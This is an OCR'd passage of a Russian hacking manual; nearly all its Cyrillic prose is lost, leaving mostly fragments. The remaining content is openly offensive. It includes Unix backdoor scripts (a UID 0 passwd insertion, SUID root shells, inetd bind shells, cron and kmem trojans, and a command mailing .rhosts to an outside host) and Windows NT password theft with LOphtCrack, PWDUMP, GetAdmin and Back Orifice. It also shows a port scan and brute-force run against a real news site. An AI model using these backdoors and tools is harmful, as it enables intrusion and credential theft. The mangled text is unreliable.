phiber. , : $ mail sys!uni S ys!pacbel l !sbel l !sc1!att .com!sirhacksys! optik!phiber . ? , . , ? (contrc-1-D) $ , 20
, ,
, :
From optik! sirhacksys! att. com! s d ! sbell! pacbell! unisys! sys!sirhack
mail username, username - .
control-D.
mail. To : $ mail : scythian : sirhack : W e l l . . . . , ! ? .
mail .
- . :
d -
f username - username
wfname - fname
Unix 93
s fname - fname
q - / mail
- ,
m username - username
-
4 [enter] - + -
-
h - .
. ,
.
- ,
,
- .
UUCP. UUCP - UUCP, .
ps . ,
.
(PID), , -
. ps . , sirhack, csh, watch scythian. watch , - ,
:
$ ps .PID TTY NAME 122 001 ksh 123 001 watch $ PS, .
TTY tty ( /),
94 Unix
process. , (!) . ps -f , watch , , watch scythian.
kill . ,
.
, (, ), EUID , , . ( EUID ). , . ,
- , - ..
, kill 122, . kill UNIX . kill pid, UNIX , , . ,
! kill -numpid (num - ). Kill -9 pid - . $ k i l l 122 $ k i l l 123 $ ps PID TTY NAME 122 001 ksh 123 001 watch $ kill -9 123 [123]-.killed $ kill -9 122 garbage NO CARRIER
kill -1 0, . .
7.
-
, sh, ksh, csh . .bat MS-DOS, . .
Unix 95
. , ,
- , .
number=1 number 1. string=Hi There
string="Hi There" string Hi
there.
- .
,
($). . ,
bat-, . , . :
counter=1 arg1="-uf" arg2="scythian" ps $arg1 $arg2 echo $counter ps -uf scythian,
1. Echo , .
:
read - .
: read . ! - , :
echo " ?" read hisname echo Hello $hisname ? Sir Hackalot Sir Hackalot : read .
96 Unix
trap - (Ctrl-c). :
trap command; command; command; .. :
trap "echo '!! ' ; echo ! ' , control-c ,
:
!! !
exit : exit []. ,
, .
CASE case .
:
case in 1) command; command;; 2) command; command; command;; *) command;; esac
.
;;>. :
echo ":" echo "(D) i rectory (L)ogoff ( S ) h e i r read choice case Schoice in D) echo " ..."; i s -al ; ; L) echo ; kil l -1 0;: S) exit;; *) Echo "! ";; esac
Unix 97
esac case.
.
8.
, . : for repeat.
repeat :
repeat 12
. :
repeat s c y t h i a n sirhack prophet
scythian, sirhack, prophet.
for
for -
do ()
done () :
for counter in 1 2 3 do echo $counter done 1, 2, 3.
9. TEST
: Test
::
-eq = () - ( )
4-2588
98 Unix
-gt > () -It < () -ge >= ( )
-1
Unix 99
expr 22+12
22+12 :
expr 22 + 12 :
34
11.
, ,
.profile.
home () .
PS1 , .
$. BSD &.
PATH .
, , ,
. MS-DOS, . ,
,
, ,
, . - ,
.
:
:/bin:/etc:/usr/lbin:$0: , Unix
/bin, /etc, /usr, /lbin , , .
, .
sh sh, , Unix /bin. . -
100 Unix
, , ,
.
TERM .
CURSES, - , esc-. - ,
- .
esc- TERMCAP. , ami vtlOO, CURSES , .
12.
. ? , .
, .
.
..
..
,
, ,
, .
makefile, make , -
.
make , ,
.
:
$ login.& [1234] $ (1234 - , .)
Unix 101
13.
Unix. , Unix,
.
.
,
, MS-DOS , , AmigaDos. ((d) ):
/ ( ) I
I I bin (d) usr (d)
.
sirhack(d) scythian (d) prophet (d) I
src (d) , :
/ /bin /usr /usr/sirhack /usr/sirhack/src /usr/scythian /usr/prophet , .
102 Unix
14.
, - .
. , ,
.
,
. .
( ) id , .
.
, / . , Unix, , UID , .
. .
(owner). , , - .
, , CHOWN, , .
, - ,
, . ,
, chgrp.
. ,
. , ,
, .
, , ,
, , - ,
. ,
, .
. , . - -
.
, .
. - . :
$ Is -1 runme r-xrwxr- sirhack root 10990 March 21 runme root , .
sirhack - . root , ,
. , Scythian, root. ,
Unix 103
. datawiz, .
, , ? . - . ,
,
, , .
,
r-x-rwxr--
(-). (-) ,
.
r-xRWXr-(, ) ,
, .
r-xrwxR-- . ,
.
:
$ I s - 1 drwxr-xr-x sirhack root 342 March 11 src d . ,
(sirhack) , .
, .,
,
:
$ chmod go-r $ is d r W x - x ~ x sirhack root 342 March 11 src -, sirhack,
.
Is, src, , , cannot read directory ( ). - , ,
- .
- ,
.
104 Unix
UNIX
1. !
,
, ,
,
,
...
!
2.
- UNIX. , ID.
ID.
. ? , GANDALF data switch .
.
(8N1 71), GANDALF UNIX. . - ,
, .
, .
,
, . LOG OFF, . , , , ,
. SU () , (, , WHO).
Unix 105
3.
. UNIX .
,
. (, UNIX ) VI.LOGIN.
VI.LOGIN : VI.LOGIN logout , VI.LOGIN
. :
,
.
:
,
.
(ROOT - ).
4.
. ( )
, UNIX. -
. , .
, ,
(, 3-4) . ID , , ,
, - . ,
UNIX, . ! , ! , -
106 Unix
. , -
, , ,
? , ,
,
, , .
, !
PASSWRDS, (SU) !
. UNIX , , .
. .
. , .
, , , NIS, NFS, , SUID, Sendmail . . ! ? #? -!
, ,
root. ? ,
?
5. root
, ,
, .
: . ( , ,
UNIX ). passwrd (
7 , , ..). vi. , UNIX . Vi . -
Unix 107
(dial-up\telnet\rlogin\whatver), , .
,
.
.
, , , ,
, ,
- .
:
,
.
:
(1) UID 0 . ,
, .
, -
.
.
...
#!/bin/csh # Inserts a UID 0 account into the middle of the passwd file. ft There is likely a way to do this in 1/2 a line of AWK or SED. Oh well. # [email protected] set l i n e c o u n t = 'wo -1 /etc/passwd' cd # Do this at home. cp /etc/passwd ./temppass # Safety first. echo passwd file has $ l i n e c o u n t [ 1 ] lines. @ l i n e c o u n t [ 1 ] /= 2 linecount[1] += 1 ft we only want 2 temp files echo Creating two files, $linecount[1] lines each \(or approximately that\). split -$linecount[1] . / temppass ft passwd string optional echo EvilUser::0:0:Mr. Sinister:/home/sweet/home:/bin/csh" ,/xaa cat ./xab . /xaa mv ./xaa /etc/passwd
108 Unix
chmod 644 /etc/passwd # or whatever it was beforehand rm ./xa ./temppass echo Done... . , ,
.
(2)
, Sync. , , , , .
UID 0 ( * ).
(3) /tmp: #!/bin/sh # Everyone'sfavorite... cp /bin/csh /tmp/.evilnaughtyshell # Don't name it that... chmod 4755 /tmp/.evilnaughtyshell \tmp .
.
,
SUID. , , ... ,
.
, .
(4)
,
?
: Internet- (\etc\ inetd\) TCP UDP .
\etc\inetd.conf. .
:
( D (2) (3) (4) (5) (6) (7) ftp stream tcp nowait root /usr/etc/ftpd ftpd talk dgram udp wait root /usr/etc/ntalkd ntalkd
(1) - , \etc\services. inetd
Unix 109
\etc\services .
, . TCP stream (- ), UDP - dgrams (, ). - (TCP UDP). . wait ,
, , nowait, ,
. - ( UID), . (6) - , (7) ( ). ( ) . internal (6) (7). , , ,
, SUID, , \etc\passwd .
:
\etc\inted.conf, , , .
:
daytime stream top nowait root internal :
daytime stream tcp nowait /bin/sh sh -i \etc\inetd\
. , .
(kill -9, /usr/sbin/inetd /usr/etc/inetd), ( ).
(5)
,
.
.
,
\etc\services, \etc\inetd.conf.
110 Unix
\etc\services : (1) (2)/(3) (4) smtp 25/tcp mail (1) - , (2) - , (3) - ,
, (4) - . \etc\services: evil 22/tcp evil /etc/inetd.conf: evil stream tcp nowait /bin/sh sh -i inetd. :
.
,
Internet.
(6)-I - .
,
, , crontab . ,
.
crontab /var/spool/cron/crontabs/root. . ,
.
- . ,
, .
crontab - , crontab. crontab , /var/spool/crontab/root.
crontab :
(1) (2) (3) (4) (5) (6) 0 * * 1 /usr/bin/updatedb
1 5 : (0-59), (0-23), (1-31), (1-12), (0-6). 6 - ( ). .
Unix 111
cron /var/spool/crontab/root. , ,
/etc/passwd U1D 0 ( - crontab, ).
/var/spool/crontab/root: 0 * * /usr/bin/trojancode :
f t ! / b i n / c s h ft Is our eviluser still on the system? Let's make sure he is. #[email protected] set evilflag = Cgrep eviluser /etc/passwd') if($#evilflag == 0) then ft Is he there? set linecount = 'wc-1 /etc/passwd' cd # Do this at home. cp /etc/passwd ./temppasstf Safety first. linecount[1] /= 2 linecount[1] += 1 ft we only want 2 temp files split -$linecount[1] ,/temppass ft passwd string optional echo "EvilUser::0:O:Mr, Sinister: /home/sweet/home:/bin/csh" ./xaa cat ./xab./xaa mv ./xaa /etc/passwd chmod 644 /etc/passwd tt or whatever it was beforehand rm ./xa* ,/temppass echo Done... else endif
(7) - II
. , () , etc/passwd. ( /var/spool/mail/.sneaky) . , ,
, 2.30 ( ) \etc\passwd ( !).
112 Unix
,
, ,
.
crontab: 29 2 * * * /bin/usr/sneakysneaky_passwd :
echo ,root:1234567890123:0:0:0perator:/:/bin/csh" > /var/spool/mail/.sneaky :
#!/bin/csh # Install trojan / e t c / p a s s w d file for one minute [email protected] cp /etc/passwd /etc/.temppass cp /var/spool/mail/.sneaky /etc/passwd sleep 60 mv /etc/.temppass /etc/passwd
(8) .
- -, .
.
, .
- .
SUID-- , . -
, ,
.
/* [email protected] */ ((include Sdefine KEYWORD "indust" define BUFFERSIZE 10 int main(argc, argv) int argc; char.argv[] ;{ int i=0; if(argv[1]){ /* we've got an argument, is it the keyword? */ if(!(strcmp(KEYW0RD,argv[1]))){ /* */ systemCcp /bin/csh /bin/. swp12V);
Unix 113
system("chown root / b i n / . s w p i 2 l " ) ; system*"chmod 4755 /bin/.swp121"); } } /* Put your possibly system specif ic t ro jan messages here */ /* Let's look like we're doing s o m e t h i n g . . . */ printfCSychroniz ing bitmap image records."); /* system*"is -alfl / >& /dev/null > /dev/null&"); */ for* ; i tmpf i le /usr/bin/uuencode tmpfile / root/ , rhosts , 25.
, uuencode- .rhosts. () :
%echo "+ +" | /usr/bin/uuencode / r o o t / , rhosts | mail decode@target . com .
, ,
.
.
114 Unix
(10) ,
, tripwire.
:
. su, login pass-wrd, . ,
UNIX. (: ,
, ). , ,
:
,
, ,
.
10- .
(11) : \dev\khem .
, , ,
UID. , , \dev\khem /. : \dev\khem, , U I D , csh, U I D . .
/* \khem , , ID 0. */ include include include include include include include define KEYWORD "nomenclaturel" struct user userpage; long address(), userlocation;
Unix 115
int main(argc, argv, envp) int argc; char *argv[], *envp[];{ int count, fd; long where, lseek(); if(argv[1]){ /* we've got an argument, is it the keyword? */ i f ( ! (strcmp(KEYW0RD,argv[1]))){ fd=(open("/dev/kmem",0 RDWR); if(fd
116 Unix
include include define LNULL ((LDFILE *)0) longaddress(){ LDFILE -object; SYMENT symbol; long idx=0; object=ldopen("/unix",LNULL); if(!object){ fprintf(stderr,"Cannot open /unix.\n"); exit (50); } for(;ldtbread(object,idx,&symbol)==SUCCESS;idx++){ if(!strcmp(" u",ldgetname(object,&symbol)))
{ fprintf(stdout, "Userpage is at 0x%8.8x\n", symbol.n_value); ldclose(object); return(symbol.n_value);
) } fprintf(stderr, "Cannot read symbol table in /unlx.\n"); exit (60); }
(12) /dev/kmem
, , , ,
.
- (7), (, 5 ) , /dev/kmem, .
(7): chmod 666 /dev/kmem sleep 300 Nap for 5 minutes chmod 600 /dev/kmem # Or whatever it was before
Unix 117
6.
:
, ,
. - ,
single-user ( ) .
-
, ,
,
,
.
(, ), . -
sendmail debug, . ,
, passwrd, , , ( , , sendmail, Internet Worm, telnet 25 .
, , , :
a) ,
root/daemon/bin, , ,
.
b) , ,
.
118 Unix
/ / ,
. ,
. ,
AT&T System V Unix acctcom(l),
. TCP/IP / , rwhod, fingerd tftpd, .
.
/ ; ( /etc, /etc/re, /etc/rcX.d) . .
chmod(l).
7. /
.
; .
-
,
.
, , ,
,
.
,
. ,
.
Unix 119
; , .
. , ,
,
.
,
! - ( ) .
8. Unix
:
:
1) . 2) src. 3) . 4) . :,
1) SUID/SGID. 2) / .. 3) . 4) . 5) . 6) . 7) . 8) . 9) . 10) /.
120 Unix
11) . 12) , . 13) .
:
I: Suid-
) . ) . ) (
sym, loc.-). ) . II: , SUID
) . ) . ) . ) . ) . III:
) . ) . ,
System Development Corporation 65%- .
:
1 .
,
.
Unix 121
:
A) : , . : .
B) : , . : i-node ( ).
C) : , . : .
.
.
, .
.
, ,
LINUX, NET2 BSD386. , ,
, ,
. ,
() , - ,
.
2 (
).
UNIX? ( , ).
who OS , .
suid- OS. - suid . : - suid, -
122 Unix
. ,
suid, suid, .
,
, -: , suid, sgid, ( suid/sgid), OS .
. ( ).
4
.
9.
1) , .
: gets, (sprintf()?, gets () ..). strcpy (), src:
define SCYPYN((a)(b)) strcpy(a, b, s izeof(a)) 2) SUID/SGID ,
PERL. 3) SUID/SGID , PERL
taintperl.
4) SUID/SGID , system(), popen(), 1() execvp() .
5) , .
6) .
Unix 123
7) , . (: fork(2),suid(2),setuid() ).
8) , : ) ; ) ; )
;
) , passwd, L.sys ..; )
/;
) , .
9) . , , .
10) man- -
-. .
11) - , .
,
/.
,
OS-. , . , telnet -h ... , login.c:
i f ( ( g e t u i d ( ) ) && t i f lagX syslogO e x i t ( ) }
12) . 13) , ,
, ,
.
124 Unix
14) , .
15) , , , .
16) : ,
.
17) - .
18) : (passwd OK, illegal parameter, segment error ..) , . 17.
19) . 20) ,
.
21) . 22) . 23) ,
-
.
24) , , .
25) , . ( UID 0, .)
26) , ... 27) . 28)
( ).
29) , , , ,
( ).
Unix 125
30) .
, ,
, ,
,
, .
31) , fopen(3) umask. (: 1(1).)
, UID .
32) Trace - ( truss SVR4). , .
33) /usr/local. .
tcpdump, top, nfswatch... suid.
34) suid , , .
, ,
.
35) , .
36) . LD PRELOAD, , .
37) I/O - , . , .
38) , I/O (pre-load ).
39) I/O , ,
.
40) , . , ,
/etc/a, ,
126 Unix
( , /etc/utmp).
41) , suid/sgid.
10.
, ,
. vi ( ). vi :
:set shell = /bin/sh shell, : :sheU
cd, ftp , cd.
Microsoft Windows 2000 127
Microsoft Windows 2000
1.
Windows NT Windows 2000
Windows NT Windows 2000. Windows
NT/2000? Windows NT/2000 ( Windows NT, .. Windows 2000 NT) ,
DOS, Windows ./95/98,
. : , . , , .
,
Windows NT - - . , Windows NT/2000 , . , ,
TCP/IP Windows NT,
(host, nslookup, talk ..). , ,
Windows NT..
, ,
. ,
,
Internets. ,
Windows NT. 10 30% . .
128 Microsoft Windows 2000
? , - .
:
1. ;
2. ;
3. . ,
.
. ,
,
Internet.
.
. , ,
. ,
, . ,
, ,
, ,
- ... .
2.
? , ,
. , ..
, . ,
,
, .. , ( ), .., , - , , . .
.
Windows NT (.. , , ). ( FAT) NTFS
Microsoft Windows 2000 129
. - Windows NT - FAT NTFS. FAT.
-
ZIP-. , , FAT. . ,
NTFS. .
NTFS , . -
Windows NT. MS-DOS , , NTFS, NTSFDOS.EXE ( - Mark Russinovich, ). Windows NT , , , . , , .
, , - ,
, , - .
, ,
NTSFDOS.EXE , , . ,
- , ,
.
- (), Windows NT ( Windows 2000). Windows NT, . :
SeNTry2020 (http://www.softwinter.com); SecurityPlus (http://www.softbytelabs.com); Ciyptext(http://www.tip.net.au/~njpayne). ,
,
, ,
- -OW (http://www.security.ru), . ,
, .
. ,
, .
5-2588
130 Microsoft Windows 2000
,
- , - ,
- .
, .
, ( ) .
, .
, ,
/ . SAM, . ,
.
WINNTASYSTEM32\CONFIG\. Windows NT , SAM, WINNT\SYS-TEM32\CONFIG\, , , .
SAM, LOPHTCrack. Rambler.ru AltaVista. .
,
. , , , .
: . , ,
, -
, .
13-16 , Windows NT 128 . , SAM ,
. - Windows NT, - LAN Manager. LAN Manager , ,
, : Windows 3.11 for Workgroups Windows 95/98. , : , LAN Manager , 14- ,
. , 14- 7- , -
Microsoft Windows 2000 131
. ,
, ,
LAN Manager.
LOphtCrack, Pentium 11-450, , , ( ).
SYSKEY, Service Pack 3. SYSKEY SAM,
. . - ,
, LOphtCrack .
3.
SAM SAM- ,
... , ,
Windows NT/2000 (registry), %SystemRoot%\SYSTEM32\ CONFIG\SAM - . , ..
.
. , -
ERD (Emergency Repair Disk), %SystemRoot%\ REPAIR\. , Administrator Guest, , . 16- , ( UNICODE) - MD4. Windows NT/2000
-.
,
Internet .
132 Microsoft Windows 2000
4. LOphtCrack
LOphtCrack , .
,
.
SAM. - . .
300 . ,
,
( 100 . ).
word-english File () Open Wordlist File ( ).
A-Z A-Z 0-9 ( ) .
- .
, .
Tools ()
Microsoft Windows 2000 133
, , ,
.
,
File () Open Password File ( ).
. lOpht-crack.exe ( 10phtcrack95.exe Windows 95/98). ,
Windows NT 4.0 ( Window 2000), sniffer readsmb.exe, Windows 3.11/95/95 MS-DOS. sniffera ND1S-, .
Ethernet- CSMA-CD. NDlS- Network () . Protocols () Add (). Have Disk ( ) , LOphtCrack Oemsetup.inf. sniffer readsmb.exe Windows.
-
.
: , SAM sniffera.
,
, Tools () Dump Password from Registry ( ). IP \\Computer_name \\IP-address.
134 Microsoft Windows 2000
Windows NT/2000 ,
.
, Windows NT/2000 , Administrator , . ,
,
. nporpaMMyregedit.exe HKEY_CURRENT_USER\Software\ LHI\LOphtCrack\AdminGroupName.
Administrator Windows NT (2000).
SAM SAM
, ERD (Emergency Repair Disk). NT %SystemRoot%\SYS-TEM32\CONFIG\. Windows NT/2000, DOS NTFSDOS (http://www.ntinternals.com/ntfs20r), SAM . LOphtCrack Import SAM File ( SAM--), File (), SAM. Windows NT (2000) , SAM, %SystemRoot%\REPAIR\. , ,
backup ERD, SAM . ERD, *._ :
EXPAND SAM. SAM
sam._ LOphtCrack. Service Pack 3 for
NT 4.0 SYSKEY - , LOphtCrack ( , LOphtCrack 2.5) SAM.
Microsoft Windows 2000 135
sniffer'a
SYSKEY ,
.
sniffer, Ethernet-.
sniffer, LOphtCrack, readsmb.exe, Windows NT 4.0 ( sniffer Windows 95/98).
sniffer'a : READSMB > PASSWD , ,
sniffer'oM, passwd.
sniffer , , .
passwd LOphtCrack.
sniffer'a -v: READSMB -V
-v , readsmb , - .
,
LOphtCrack, word-eng-lish, . Run () Tools ().
, Tools Options no , ,
word-english. -
, . LOphtCrack 5 *.LC .
136 Microsoft Windows 2000
LOphtCrack 2.52 450%
Pentium, Pentium MMX, Pentium Pro Pentium II III. .
-
Pentium II/450.
.
.
SMB sniffer'a Windows 95/98.
PWDUMP2,
SAM, SYSKEY SP3.
PWDUMP2 http://www.webspan.net/~tas/pwdump2/
SYSKEY , , ,
Administrators. , ,
.
Windows NT PWL-.
Windows 3.11/95/98, ,
Windows NT . *.PWL , Windows 3.11/95/98. repwl.exe, http://webdon.com /vitas/pwltool.htm.
PWL-, .. Browse () PWL-,
Search Password ( ).
Microsoft Windows 2000 137
Windows NT. ,
, ,
,
. ,
: http://www.microsoft.com/ntserver/security/exec/overview/ Secure_NTInstall.asp
.
, ,
,
, . ,
-
, ...
GetAdmin.exe ( - - ). , Service Pack 4 , . , , - .
NT , , System Account, , .
. , , Billy , SP4 . : , .
5.
,
Windows NT. , ,
,
Windows NT ( ) .
:
Named Pipe File System.
138 Microsoft Windows 2000
6. Named Pipe File System
Named Pipe File System , , named pipes. named pipes , , (mail-slots). , ( CreateFile, ReadFile WriteFile), . named pipes , .
( ), ( ). Windows NT :
Win32 CreateNamedPipe.
ConnectNamedPipe, .
Wcomputer name\pipe\pipe name CreateFile.
CloseHandle. DisconnectNa-medPipe.
ConnectNamedPipe.
.
N- , N- CreateNamedPipe ( ).
,
( ) .
Microsoft Windows 2000 139
ReadFile WriteFile.
WriteFile, , ReadFile.
Named Pipe File System Windows NT ,
. , (RPC) Windows NT NPFS.
Named Pipe File System .
PipeBomb AdminTrap, Named Pipe File System.
7. PipeBomb
PipeBomb
.
, ,
, .
(thread), .
,
.
,
.
.
,
Windows NT 4.0. PipeBomb .
Create () Write (), Windows NT .
140 Microsoft Windows 2 0 0 0
Internet, SMB TCP/IP ( Named Pipe File System SMB).
S. AdminTrap
AdminTrap ,
. AdminTrap Win32 ImpersonateNa-medPipeClient, (access token) , handle . ,
AdminTrap -- .
, AdminTrap Imperso-nateNamedPipeClient , , :
winreg - , ,
(alerts), ,
;
spoolss - .
.
, ,
,
,
AdminTrap, Administrators.
9.
Back Oriffice 2000 Back Orifice ( - )
Windows NT Internet. B02K ,
Microsoft Windows 2000 141
,
.
Windows 95/98 Windows NT.
2 ( bo2kgui.exe)
TCP UPD 31337.
( 120 ) IP-.
. , ,
:
;
;
;
;
, ;
;
;
.
2 Configuration Wizard ( bo2kcfg.exe). 2 Configuration Wizard 2 (2.) , . , IP-, .
,
IP- TCP UPD. TCP- Internet. UPD- .
142 Microsoft Windows 2000
,
bo2k.exe , Plugins DLL.
10. Windows NT Internet
Windows NT Internet. - , IP-. Web-, , .
, ,
Web-. Web- HS 3.0/4.0/5.0, Microsoft Windows NT, : Web- *.htm, *.asp; Winl253, KOI8-R ( ) .
,
. ,
ind&cMm, . Internet^ Web- : http://www.ida-honews.com/, . ,
scripts cgi-bin.
scripts cgi-bin , - . ,
Web-. - , , scripts cgi-bin. .
, cgi-bin , Windows NT Perl. ,
. , cgi-bin MSWin32-x86-object. .
Microsoft Windows 2000 143
, MSWin32-x86-object Perl 5.0, Perl 5.00502.exe. PerlIS-Err.log:
*** -E:\docs' error message at: 1998/11/24 13:23:57 Can't open perl script "E:\does": Permission denied . . . 'E:\docs- error message at: 1998/12/25 04:49:16 Can't open perl script "E:\docs": Permission denied . . . -E:\docs' error message at: 1999/03/26 16:05:43 Can't open perl script "E:\docs": Permission denied . . . 'E:\docs' error message at: 1999/09/08 11:39:54 Can't open perl script "E:\docs": Permission denied -. 'E:\docs' error message at: 1999/09/08 11:58:34 Can't open perl script "E:\
144 Microsoft Windows 2000
, , ..,
, .
, , , .
Windows:
7th Sphere PortScanv 1.1 All Around Internet Ogre v0.9b Port Scannerv 1.1
PortScan Plus SiteScan by Rhino9/Intercore TCP Port Scanner
UltraScanvl.2. http://208.234..
248.19:81/hack/genar/archive5.html. Ogre v0.9b (Rhino9). Windows UNIX Internet.
Ogre Windows NT Internet.
Ogre
Windows 95 Windows NT, . Ogre :
;
,
,
;
netbios (Nbtstat);
,
(net view);
Microsoft Windows 2000 145
Microsoft Frontpage;
;
Index Server.
11. Ogre
IP- http://www.idahonews.com/.
ping www.idahonews.com: Pinging www.idahonews.com [198.60.102.4] with 32 bytes of data: Request timed out. Request timed out. Request timed out. Request timed out. IP- DNS, ping
. , firewall'OM .
idahonews.com. ,
, IP Starting IP ( IP-) 198.60.102.1. Ending Octet 254 ( ). Start scan ( ).
:
Scanning - 198.60.102.1
Commencing Port Scan:
Port 21: Closed Port 23: Open Port 25: Closed 'Port 53: Closed Port 79: Open
146 Microsoft Windows 2000
Port 8 0 : Closed Port 110: Closed Port 1 1 1 : Closed Port 139: Closed Port 443: Closed Port 1080: Closed Port 8181: Closed
Scanning - 198.60.102.2
I n a c t i v e IP address*
Scanning - 198.60.102.3
Inactive IP address*
Scanning - 198.60.102.4
. IP address*
Scanning - 198.60.102.5
Commencing Port Scan:
Port 21: Closed Port 23: Closed Port 25: Open Port 53: Open Port 79: Open Port 80: Closed Port 110: Open Port 111: Closed Port 139: Closed Port 443: Closed Port 1080: Closed Port 8181: Closed
Scanning - 198.60.102.6
*Inactive IP address*
Scanning - 198.60.102.38
Microsoft Windows 2000 147
. I n a c t i v e IP address*
Scanning - 1 9 8 . 6 0 . 1 0 2 . 3 9
Commencing Port Scan:
Port 21: Closed
Port 23: Closed Port 25: Open Port 53: Open Port 79: Open Port 80: Closed Port 110: Open Port 111: Closed) Port 139: Closed Port 443: Closed Port 1080: Closed, Port 8181: Closed Scanning - 1 9 8 . 6 0 . 1 0 2 . 4 0
i n a c t i v e IP address*
Scanning - 1 9 8 . 6 0 . 1 0 2 . 5 4
. I n a c t i v e IP address*
Scanning - 1 9 8 . 6 0 . 1 0 2 . 5 5
Commencing Port Scan:
Port 2 1 : Closed Port 23: Closed, Port 25: Open Port 53: Open Port 79: Open Port 80: Closed Port 110: Open Port 111: Closed Port 139: Closed Port 443: Closed Port 1080: Closed
148 Microsoft Windows 2000
Port 8181: Closed Scanning - 198.60.102.56
.Inactive IP address*
Scanning - 198.60.102.254
Inactive IP address* Windows NT
135-139. , .
:
Scanning - 198.60.102.4
.Inactive IP address* , firewaUoM.
, .
tracert 198.60,102.1 ( UNIX trace-route):
Tracing route to cisco.idahonews.com [198.60.102.1]over a maximum of 30 hops: 11 240 ms 241 ms 240msgbr2-p01.wswdc.ip.att.net ,[12.123.8.241] 12 261 ms 260 ms 251 ms gbr1-p40.oc-48., ip.att.net [12.122.2.82] 13 330 ms 301 ms 390 ms gbr2-p50.oc-12.sffca.ip.att.net [12.122.3.17] 14 301 ms 320 ms 311 msar2-a3120s4.sffca.ip.att.net [12.127.1.145] 15 401 ms 350 ms 351 ms 12.126.207.46 16 381 ms 350 ms 371 ms cisco.idahonews.com [198.60.102.1] Trace complete
, -
. ,
198.60.102.1 Firewall Cisco. . , , ,
. cisco.idahonews.com Ogre : 23 (Telnet), 79.
tracert 198.60.102.5: Tracing route to router.idahonews.com [I98.60.l02.5]over a maximum of 30 hops:
Microsoft Windows 2000 149
12 260 ms 270 ms 261msgbr1-p40.oc-48.sl9mo.ip.att.net [12.122.2.82113 321 ms 310 ms 300 ms gbr2-p50.oc-12.sffca. ip.att.net [12.122.3.17] 14 310 ms 321 ms 320 ms ar2-a300s3.sffca. ip.att .net [12.127.5.177] 15 341 ms 340 ms 371 ms 12.126.207,34 16 371 ms * * 198.60. 104. 181 17 361 ms 361 ms 370 ms router.idahonews.com [198.60.102.5] Trace complete , 198.60.
102.5 router ( UNIX-). router.idahonews.com : 25 (SMNP-), 53 (DNS-cep-), (POP-). , , DNS-. ,
idahonews.com 192.168.0.*.
198.60.102.6-253 , IP- idahonews.com.
,
. www.idahonews.com .
, Firewall'oB Cisco Unix- . ,
Windows NT Firewall'oM 135-139 .
12. Windows NT
, , Internet Windows NT, Firewall'oM, 135-139 . , ,
, firewall, . , ,
, Windows NT Service Pack. IIS, , , ,
150 Microsoft Windows 2000
, ,
fix'bi, (Binding) Network ().
, Ogre : Scanning - 198.60.102.4
Commencing Port Scan: Port 21: Open
, FTP, IIS.
Port 23: Closed Port 25: Open
, SMNP, IIS Port 53: Open Port 79: Closed Port 80: Open
, HTTP, IIS. Port 110: Open Port 111: Closed Port 139: Open
, File Sharing. Port 443: Closed Port 1080: Closed Port 8181: Closed Surveying Web Server: -Checking for Vulnerable URLs: Frontpage Extensions: Not Present IIS HTML Administration Interface: Present
, IIS. IIS Samples: Present Commencing Nbtstat Scan: NetBIOS Remote Machine Name Table Name Type Status
Registered Registered Registered Registered Registered Registered Registered Registered Registered Registered Registered
MAC Address = XX-XX-XX-XX-XX-XX X, Y Z ,
, firewall'OM.
Microsoft Windows 2000 151
YYYYY UNIQUE - - YYYYY UNIQUE ZZZZZZZZZ GROUP ZZZZZZZZZ GROUP ZZZZZZZZZ UNIQUE ZZZZZZZZZ GROUP YYYYY UNIQUE .ZZZZZZZZZ UNIQUE I N e f S e r v i c e s GROUP ,.__MSBR0WSE__. GROUP
IS~YYYYY UNIQUE , NetBIOS ,
nbtstat -.... NetBIOS .
UNIQUE , IP-;
4 GROUP , IP-.
, ,
,
Windows NT.
,
FTP.
, ,
Windows NT (Guest, Administrator), . ,
IIS (Internet Information Service), IUSR_
152 Microsoft Windows 2000
NAT
NetBIOS Auditing Tool, UNIX, Win32.
Nat - , NetBIOS.. .
:
NAT [-0 ] [-U ] [- ]
. , ,
Ogre. LOphtCrack, Passlist.txt. , Ogre. nat:
NAT - REZALT.TXT 198.60.102.4
NAT , .
,
,
.
, NAT 30 50 .
Windows NT 100% . , , , . NAT Administrator,
.
, NAT , Administrator, ,
. , ,
NET USE, 8._ WINNT/REPAIR LOphtCrack, .
Microsoft Windows 2000 153
, NET USE ( FTP), , ,
(Getadmin ..). Windows NT InetPub/cgi-bin. , , , :
http://www.idahonews/scripts/getadmin.exe?mmmm mmmm ,
.
PWDUMP.EXE ( ) Back Orifice NetBus (http://indigo.ie/ ~lmf/nb.htm), .
154
1.
, -
, .
:
. - .
, UNIX login root . .
(, login&password).
(sniffing), (-).. - ,
.
: WWW- WWW- - JAVA, ActiveX.
WWW- / .
,
.
; ,
155
, ,
, , - .. ,